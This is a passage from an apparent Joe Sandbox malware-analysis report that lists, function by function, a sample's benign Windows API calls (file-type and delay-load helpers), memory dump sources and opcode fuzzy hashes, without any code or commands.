Opcode Fuzzy Hash: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
Instruction Fuzzy Hash: 80D09E71144300BBD6112B51CE06F4A7AB2BB99B04F404955B3C4740B4CA779D61EB11

Uniqueness

Uniqueness Score: -1.00%

Function 010098BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,010097BE), ref: 010098C8

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
Instruction ID: 1fb0e3154a6043a8d13b8d0db464858d1214f0d85553763f3737c6482a8f597e
Opcode Fuzzy Hash: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
Instruction Fuzzy Hash: AAC01274400105C59E73462894440957751AA42279BB486D4D0AC891D3C333C547EB10

Uniqueness

Uniqueness Score: -1.00%

Function 0101E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d4e6369713e04607d51a4505b3d15b01b3a4059646434413c362ec799ca46b84
Instruction ID: 5ff96de9461d4158f60c1b91e5365f93a8f1105dc464786ec99da415e3066450
Opcode Fuzzy Hash: d4e6369713e04607d51a4505b3d15b01b3a4059646434413c362ec799ca46b84
Instruction Fuzzy Hash: 85B012E5258101FC30051196DD06CBF111CF6C2A10320842FFCCADC484D8449C410471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8602067011b817eb48a7c3445049ba45cda653d1f9c171b8573dff35b1c8c6a1
Instruction ID: ca840653b39987abb5a73845b38773fea99e3f6d3893212e7b8b6933f2efc414
Opcode Fuzzy Hash: 8602067011b817eb48a7c3445049ba45cda653d1f9c171b8573dff35b1c8c6a1
Instruction Fuzzy Hash: 24B012E525C101EC3005519ADD06CBF111CF6C1910320402FFCCECC084D8445C410571

Uniqueness

Uniqueness Score: -1.00%

Function 0101E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aaf1af0051368efcd46b8f07b91378c819fb6c1be6e603b46fdcea3a1788e185
Instruction ID: 0bf389340c27f92d10abb063e0b80ad5b6fff3411c75cd12cbb4e7e8c97b338e
Opcode Fuzzy Hash: aaf1af0051368efcd46b8f07b91378c819fb6c1be6e603b46fdcea3a1788e185
Instruction Fuzzy Hash: 70B012E1258001EC30055656DD05CBF111CF6C1A20320C02FFCCECC184D8449C450471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4297aa6c03c47da4781451ec4321f93de5e006abcad7cc86d2f4c825344920f4
Instruction ID: 16b6728ec751a05294144d33f3e699467f803e35b0dea1ccac81917338dd6c99
Opcode Fuzzy Hash: 4297aa6c03c47da4781451ec4321f93de5e006abcad7cc86d2f4c825344920f4
Instruction Fuzzy Hash: 9EB012E1368141FD30455256DD05CBF111CF6C0920320812FFCCECC184D8445C850471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 93151875ebb93d110a0b1e28fc1a6bb94da0364a4af1cfe148ec1587c4b89381
Instruction ID: cd70605c8cdcf644768da5b1626b17a05adff152b0e3ca669021a47e8f7d4e34
Opcode Fuzzy Hash: 93151875ebb93d110a0b1e28fc1a6bb94da0364a4af1cfe148ec1587c4b89381
Instruction Fuzzy Hash: 38B012E1258001EC30055256DE05CBF111CF6C0920320802FFCCECC184DC445D4A0471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3390f3a82c9e7bea4adcb836a6624bd24f2c551e817fb019280cca0e0ba46eba
Instruction ID: 10525fe6a56efb750e824890774332c6b5c10526b59e977fc2a31927558e2381
Opcode Fuzzy Hash: 3390f3a82c9e7bea4adcb836a6624bd24f2c551e817fb019280cca0e0ba46eba
Instruction Fuzzy Hash: 8AB012F1258001FC30055156DD05CBF115CF6C1F10320802FFCCECC084D8449D450471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e64cd79a532cf4ec102dad5bd3dc23ad95f3f96019c6ca61f318a992195e690b
Instruction ID: 9782547166103dc46d1bf7ea15c09e8f14cc583ac68d401e17357ed581be974d
Opcode Fuzzy Hash: e64cd79a532cf4ec102dad5bd3dc23ad95f3f96019c6ca61f318a992195e690b
Instruction Fuzzy Hash: 4FB012F1258101FD30455156DD05CBF115CF6C0E10320412FFCCECC084D8445D8104B1

Uniqueness

Uniqueness Score: -1.00%

Function 0101E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 98378efc6b6ec9447637156f9605d89458653cf43437defa50d2c9865af84593
Instruction ID: 7355c22bbead29b5bc7e7ce2fceab7e32abb78ff286265dfe9fce92d2ab4fa88
Opcode Fuzzy Hash: 98378efc6b6ec9447637156f9605d89458653cf43437defa50d2c9865af84593
Instruction Fuzzy Hash: 89B012F1258001EC30055556DE05CBF115CF6C0E10320402FFCCECC084DC445E420471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 10082246d861746b15a3cdb308c7b4f363c95421f6720ab6aedb5dc92ced943f
Instruction ID: 5cbcc7a153bbe98248640cd6314caa06239b6ad8fb61148a845c1e3f408d876b
Opcode Fuzzy Hash: 10082246d861746b15a3cdb308c7b4f363c95421f6720ab6aedb5dc92ced943f
Instruction Fuzzy Hash: 28B012F1258001EC30055157DD05CBF115CF6D0E10320402FFCCECC084D8445D410471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dbf1966e7ac59137367d2d20a484da3ea5a148191f7d2535bb3aff7e4bdb0a22
Instruction ID: b2c40ba8b135e5448102529fdf150c7e7cbd843928fca5f99796b982c1c566cf
Opcode Fuzzy Hash: dbf1966e7ac59137367d2d20a484da3ea5a148191f7d2535bb3aff7e4bdb0a22
Instruction Fuzzy Hash: 89B012E1259041EC30055156DD05CBF111DF7C1A10320802FFCCECC084D8449C410471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cdddb0cc763a21a338fb23efa9e91953a9d89acbe4fc2e56386e8692d69239cb
Instruction ID: 83637c04ff00bce7e9de6fc22033e93fd6ad7be8891bbc49264a001c40495572
Opcode Fuzzy Hash: cdddb0cc763a21a338fb23efa9e91953a9d89acbe4fc2e56386e8692d69239cb
Instruction Fuzzy Hash: 75B012F1259141FD30455256DD05CBF111DF7C0910320412FFCCECC084D8445C850471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9db7c88fd303988819c54b8ff565029bb8d7dad9a1275f83e7f5a8c93397b0ae
Instruction ID: e0aeba5ee79d3d2f03f4d34176bdcea84196a858ca29dcb6d883c46ef0b75eff
Opcode Fuzzy Hash: 9db7c88fd303988819c54b8ff565029bb8d7dad9a1275f83e7f5a8c93397b0ae
Instruction Fuzzy Hash: 2CB012E1269041EC30055156DD05CBF115DFBC0910320402FFCCFCC084D8445C410471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f037ae8c3b292396f0abbd902f83130b83cdb620b4ebb4e0e2cfa21407702068
Instruction ID: bd6ff8c7039774ba3754c8e646c49a5dd1b1b0c8236d03d57bf20b011aae1a85
Opcode Fuzzy Hash: f037ae8c3b292396f0abbd902f83130b83cdb620b4ebb4e0e2cfa21407702068
Instruction Fuzzy Hash: C2B012E1258001EC30055166DD05CBF115CF6C1A10320802FFCCECC084D844DD810471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e9a867804a46bb0ce3a07c30513230b40b7e60f6320f370101f082eee09603ba
Instruction ID: fd1418eb35aaa4a8b0adb9ea5527ebfd145f80f6751442d17db9b6e78c47552c
Opcode Fuzzy Hash: e9a867804a46bb0ce3a07c30513230b40b7e60f6320f370101f082eee09603ba
Instruction Fuzzy Hash: 45B012F1258001EC30055156DE05CBF119CF6C0910320402FFCCECC084DC445E820471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f9658218c85e454a2b23f1d743b698d92fc6e26c6b2021d2abf5b63cae8ad3d2
Instruction ID: c9893906fb87a1a4c67658c3738dbbdf41876e406f7ec9efa91a8b06d4dcaead
Opcode Fuzzy Hash: f9658218c85e454a2b23f1d743b698d92fc6e26c6b2021d2abf5b63cae8ad3d2
Instruction Fuzzy Hash: 51B012E1258001EC30055156DD06CFF111CF6C0910320442FFCCECC0C4D8445C410471

Uniqueness

Uniqueness Score: -1.00%

Function 0101E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
